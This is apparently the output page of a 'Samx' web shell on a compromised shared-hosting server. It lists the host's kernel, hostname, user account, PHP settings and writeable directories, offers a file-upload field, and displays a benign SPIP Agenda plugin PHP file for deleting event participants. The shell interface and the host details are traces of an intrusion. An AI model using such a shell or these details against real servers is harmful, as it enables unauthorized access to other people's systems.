Samx Here
n1udSecurity


Server : Apache
System : Linux webd348.cluster026.gra.hosting.ovh.net 5.15.148-ovh-vps-grsec-zfs-classid #1 SMP Thu Feb 8 09:41:04 UTC 2024 x86_64
User : hednacluml ( 122243)
PHP Version : 8.3.9
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/hednacluml/info/plugins/auto/agenda/action/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/hednacluml/info/plugins/auto/agenda/action/supprimer_evenement_participant.php
<?php
/**
 * Plugin Agenda 4 pour Spip 3.0
 * Licence GPL 3
 *
 * 2006-2011
 * Auteurs : cf paquet.xml
 */

if (!defined('_ECRIRE_INC_VERSION')) {
	return;
}


function action_supprimer_evenement_participant_dist() {
	$securiser_action = charger_fonction('securiser_action', 'inc');
	$arg = $securiser_action();
	list($id_evenement, $id_evenement_participant) = explode('-', $arg);
	include_spip('inc/autoriser');
	if (intval($id_evenement) and autoriser('modifier', 'evenement', $id_evenement)) {
		if (intval($id_evenement_participant)) {
			sql_delete('spip_evenements_participants', 'id_evenement='.intval($id_evenement).' AND id_evenement_participant='.intval($id_evenement_participant));
		} else if ($id_evenement_participant == 'tous') {
			sql_delete('spip_evenements_participants', 'id_evenement='.intval($id_evenement));
		}
	}
	return true;
}

SAMX